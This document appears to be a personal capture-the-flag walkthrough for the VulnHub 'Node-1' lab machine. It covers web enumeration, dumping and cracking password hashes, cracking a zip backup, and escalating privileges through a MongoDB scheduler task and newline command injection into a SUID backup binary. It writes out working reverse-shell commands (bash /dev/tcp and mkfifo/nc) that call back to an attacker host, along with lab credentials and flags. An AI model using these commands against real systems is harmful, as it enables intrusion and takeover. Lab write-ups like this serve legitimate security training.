Recon
TCP/3000 (HTTP)
FFUF
```
┌──(root💀kali)-[~/vulnHub/Node-1]
└─# ffuf -u http://$ip:3000/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php,.cgi,.log' -fw 727

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.40:3000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt .php .cgi .log
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 727
________________________________________________

assets                  [Status: 301, Size: 171, Words: 7, Lines: 10]
uploads                 [Status: 301, Size: 173, Words: 7, Lines: 10]
vendor                  [Status: 301, Size: 171, Words: 7, Lines: 10]
:: Progress: [27690/27690] :: Job [1/1] :: 1985 req/sec :: Duration: [0:00:19] :: Errors: 0 ::
```
Initial Foothold
TCP/3000 (HTTP) - Insecure Web Application
- Proceed to the website
- There is a login page
- Proceed to `/login`, determine if page is susceptible to SQLi Auth Bypass - Failed
- Intercept w/ burpsuite
  - `/api/session/authenticate` is queried - JSON Request
- View files that are queried on this website
  - Inspect Element -> Sources -> js -> app -> controllers
  - Files in the `/api` directory are being queried
- Enumerate files/dirs in `/api`
```
┌──(root💀kali)-[~/vulnHub/Node-1]
└─# ffuf -u http://$ip:3000/api/FUZZ -w /usr/share/wordlists/dirb/common.txt -e '.html,.txt,.php,.cgi,.log' -fw 727

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.110.40:3000/api/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Extensions       : .html .txt .php .cgi .log
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response words: 727
________________________________________________

session                 [Status: 200, Size: 23, Words: 1, Lines: 1]
users                   [Status: 200, Size: 611, Words: 1, Lines: 1]
:: Progress: [27690/27690] :: Job [1/1] :: 1191 req/sec :: Duration: [0:00:17] :: Errors: 0 ::
```
- View enumerated directories
  - `session`
  - `users`

```
┌──(root💀kali)-[~/vulnHub/Node-1]
└─# curl -s $ip:3000/api/users | python -m json.tool
[
    {
        "_id": "59a7365b98aa325cc03ee51c",
        "is_admin": true,
        "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
        "username": "myP14ceAdm1nAcc0uNT"
    },
    {
        "_id": "59a7368398aa325cc03ee51d",
        "is_admin": false,
        "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
        "username": "tom"
    },
    {
        "_id": "59a7368e98aa325cc03ee51e",
        "is_admin": false,
        "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
        "username": "mark"
    },
    {
        "_id": "59aa9781cced6f1d1490fce9",
        "is_admin": false,
        "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
        "username": "rastating"
    }
]
```
- Credentials obtained
- Extract usernames, passwords

```
┌──(root💀kali)-[~/vulnHub/Node-1]
└─# curl -s $ip:3000/api/users | python -m json.tool | grep pass | cut -d ':' -f2 | sed 's/\",//g' | cut -d '"' -f2 |tee hashes.txt
dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240
de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73
5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0

┌──(root💀kali)-[~/vulnHub/Node-1]
└─# curl -s $ip:3000/api/users | python -m json.tool | grep user | cut -d ':' -f2 | sed 's/\",//g' | cut -d '"' -f2 |tee usernames
myP14ceAdm1nAcc0uNT
tom
mark
rastating
```
- Crack hashes

```
┌──(root💀kali)-[~/vulnHub/Node-1]
└─# hashcat -a 0 -m 1400 hashes.txt /usr/share/wordlists/rockyou.txt --show
dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af:manchester
f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240:spongebob
de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73:snowflake

┌──(root💀kali)-[~/vulnHub/Node-1]
└─# hashcat -a 0 -m 1400 hashes.txt /usr/share/wordlists/rockyou.txt --show | cut -d ':' -f2 | tee passwords.txt
manchester
spongebob
snowflake

┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
└─# paste -d ':' usernames passwords.txt | tee hydra_creds.txt
myP14ceAdm1nAcc0uNT:manchester
tom:spongebob
mark:snowflake
rastating:
```
TCP/22 (SSH) - Bruteforce
- Tried to SSH w/ our creds, failed
```
┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
└─# hydra -C hydra_creds.txt -e nsr ssh://$ip
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-03-13 18:29:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries, ~1 try per task
[DATA] attacking ssh://192.168.110.40:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-03-13 18:29:26
```
TCP/3000 (HTTP)
- Log in to the web application w/ myP14ceAdm1nAcc0uNT:manchester & download `Backup`
- Only myP14ceAdm1nAcc0uNT:manchester is an admin account, the rest are ordinary accounts
- Analyze `myplace.backup`
- Find out what kind of file it is
```
┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
└─# file myplace.backup
myplace.backup: ASCII text, with very long lines (65536), with no line terminators
```
- ASCII text
- View contents

```
.... AAAAAAEAAAAAFBLBQYAAAAAXwNfA3edAQDQ+iUAAAA=
```

- `=` is the padding character used in base64
- Decode the content of `myplace.backup`

```
┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
└─# cat myplace.backup | base64 -d > decoded_myplace.backup
```
- Find out what kind of file it is

```
┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
└─# file decoded_myplace.backup
decoded_myplace.backup: Zip archive data, at least v1.0 to extract, compression method=store
```

- `.zip` file
- Extract it
```
┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
└─# mv decoded_myplace.backup decoded_myplace.zip

┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
└─# unzip decoded_myplace.zip
Archive:  decoded_myplace.zip
   creating: var/www/myplace/
[decoded_myplace.zip] var/www/myplace/package-lock.json password:
```
- Password protected
Crack zip file
- Crack zip file w/ fcrackzip
```
┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
└─# fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt decoded_myplace.zip
'var/www/myplace/' is not encrypted, skipping
found file 'var/www/myplace/package-lock.json', (size cp/uc   4404/ 21264, flags 9, chk 0145)
'var/www/myplace/node_modules/' is not encrypted, skipping
'var/www/myplace/node_modules/serve-static/' is not encrypted, skipping
found file 'var/www/myplace/node_modules/serve-static/README.md', (size cp/uc   2733/  7508, flags 9, chk 1223)
found file 'var/www/myplace/node_modules/serve-static/index.js', (size cp/uc   1640/  4533, flags 9, chk b964)
found file 'var/www/myplace/node_modules/serve-static/LICENSE', (size cp/uc    697/  1189, flags 9, chk 1020)
found file 'var/www/myplace/node_modules/serve-static/HISTORY.md', (size cp/uc   2625/  8504, flags 9, chk 35bd)
found file 'var/www/myplace/node_modules/serve-static/package.json', (size cp/uc    868/  2175, flags 9, chk 0145)
'var/www/myplace/node_modules/utils-merge/' is not encrypted, skipping
found file 'var/www/myplace/node_modules/utils-merge/README.md', (size cp/uc    344/   634, flags 9, chk 9f17)
found file 'var/www/myplace/node_modules/utils-merge/index.js', (size cp/uc    219/   381, flags 9, chk 9e03)
8 file maximum reached, skipping further files


PASSWORD FOUND!!!!: pw == magicword
```
- Unzip `decoded_myplace.zip`

```
┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/exploit]
└─# unzip decoded_myplace.zip
Archive:  decoded_myplace.zip
   creating: var/www/myplace/
[decoded_myplace.zip] var/www/myplace/package-lock.json password: magicword
```
- `/var` contains the files of the entire web application
- After browsing through the files, SSH credentials are in `app.js`
  - MongoDB database
  - mark:5AYRft73VtFpc84k
TCP/22 (SSH)
- SSH w/ mark:5AYRft73VtFpc84k
Privilege Escalation
Tom - Via Insecure Application
- View files in Tom’s home directory
```
mark@node:/home/tom$ ls -la
total 40
drwxr-xr-x 6 root root 4096 Sep  3  2017 .
drwxr-xr-x 5 root root 4096 Aug 31  2017 ..
-rw-r--r-- 1 root root  220 Aug 29  2017 .bash_logout
-rw-r--r-- 1 root root 3771 Aug 29  2017 .bashrc
drwx------ 2 root root 4096 Aug 29  2017 .cache
drwxr-xr-x 3 root root 4096 Aug 30  2017 .config
-rw-r----- 1 root root    0 Sep  3  2017 .dbshell
-rwxr-xr-x 1 root root    0 Aug 30  2017 .mongorc.js
drwxrwxr-x 2 root root 4096 Aug 29  2017 .nano
drwxr-xr-x 5 root root 4096 Aug 31  2017 .npm
-rw-r--r-- 1 root root  655 Aug 29  2017 .profile
-rw-r----- 1 root tom    33 Sep  3  2017 user.txt
mark@node:/home/tom$
```
- User Flag is there, we have to privilege escalate to Tom.
- Linpeas
  - `/usr/bin/node /var/scheduler/app.js` - Unknown application running
  - `/usr/bin/node /var/www/myplace/app.js` - Web application currently running
- View contents of `/var/scheduler/app.js`
```
mark@node:/home/tom$ cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);
});
```
- Scheduler app connects to the MongoDB database w/ Mark's credentials periodically,
  - retrieving a value called `cmd` from the `tasks` collection,
  - executing `cmd`, and
  - deleting the `cmd` value from the `tasks` collection after executing it
- Since this application is started by Tom, the command will be executed as Tom, allowing us to privilege escalate.
- To exploit this, we add a `cmd` value to the `tasks` collection that will execute a reverse shell, allowing us to privilege escalate to Tom
- Exploiting the vulnerability
- Connect to MongoDB w/ Mark’s credentials
```
mark@node:/home/tom$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
MongoDB shell version: 3.2.16
connecting to: scheduler
> show collections
tasks
```
- Create reverse shell payload
```
mark@node:/tmp$ printf '#!/bin/bash\n\n /bin/bash -i >& /dev/tcp/192.168.110.4/4444 0>&1\n' > exploit; chmod 4777 exploit;
```
- Add a `cmd` value to the `tasks` collection that will execute the reverse shell payload we just created

```
db.tasks.insert( {_id: 0, cmd: "/tmp/exploit"} )
WriteResult({ "nInserted" : 1 })
```
- Successfully privilege escalated to Tom
- User Flag

```
tom@node:~$ cat user.txt
cat user.txt
e1156acc3574e04b06908ecf76be91b1
tom@node:~$
```
Root - Via SUID Binary + Insecure Application
- Enumerate SUID files
```
tom@node:~$ find / -perm -4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/tmp/tombash
/tmp/exploit
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/bin/mount
```
- View contents of `/usr/local/bin/backup`

```
tom@node:/tmp$ strings /usr/local/bin/backup
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
strcpy
exit
sprintf
srand
fopen
strncpy
puts
time
clock
getpid
fgets
strstr
strcspn
fclose
strcat
remove
system
geteuid
strchr
access
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
[37m
[33m
%s[!]%s %s
[32m
%s[+]%s %s
%s[+]%s Starting archiving %s
[... "Secure Backup v1.0" banner art omitted ...]
Could not open file
Validated access token
Ah-ah-ah! You didn't say the magic word!
Finished!
Encoded backup is below:
[... base64-encoded blob omitted ...]
/root
/etc
/tmp/.backup_%i
/usr/bin/zip -r -P magicword %s %s > /dev/null
/usr/bin/base64 -w0 %s
The target path doesn't exist
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
backup.c
displaySuccess
displayWarning
displayTarget
main
[... remaining symbol and section names omitted ...]
```
- There is a base64 encoded backup
- `/usr/bin/zip -r -P magicword %s %s > /dev/null`
  - The directory we specify will be zipped with the password `magicword`
- Earlier, `app.js` revealed Mark's credentials; it also contains information about the `backup` binary: `-q <backup_key> <directory name to backup>`
- Backup `/etc/`

```
tom@node:/tmp$ backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /etc/
 [+] Finished!
 [+] Encoded backup is below:

[... base64-encoded backup omitted ...]
```
- Decode & unzip
```
┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/loot]
└─# 7z e decoded.zip

┌──(root💀kali)-[~/vulnHub/Node-1/192.168.110.40/loot]
└─# cat root.txt
[ASCII-art troll face instead of the flag]
```
- `/etc/` & `/root` are hardcoded to display this troll face
- Unsure of how to do command injection, had to look at a writeup
- The exploit will not work in a pseudo terminal, execute a reverse shell to obtain another shell that is not a pseudo terminal
```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.110.4 4242 >/tmp/f

┌──(root💀kali)-[~/vulnHub/Node-1]
└─# nc -nvlp 4242
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4242
Ncat: Listening on 0.0.0.0:4242
Ncat: Connection from 192.168.110.40.
Ncat: Connection from 192.168.110.40:57888.
/bin/sh: 0: can't access tty; job control turned off
$
```
- Command Injection
```
$ /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 "$(echo '/test_dir\n\n/bin/bash\nls')"
```
- Reference
- Explanation
Presumably, the binary is using string interpolation to build up a shell command to run. We can use this to our advantage by using command injection. Given we cannot change the output being redirected to /dev/null, and given the script will still want to zip up a folder, we will need to pass in a string as the third parameter to the binary executable with multiple \n characters printed to bring about new lines. Then, when /bin/bash is executed we will have root access as the binary runs as root. We add the final command `ls` so that the output of our bash session is not redirected to /dev/null.
- Root Flag
```
cd /root
ls
root.txt
cat root.txt
1722e99ca5f353b362556a62bd5e6be0
```
- Thoughts:
- Initial foothold is easy/medium,
- The privilege escalation is quite challenging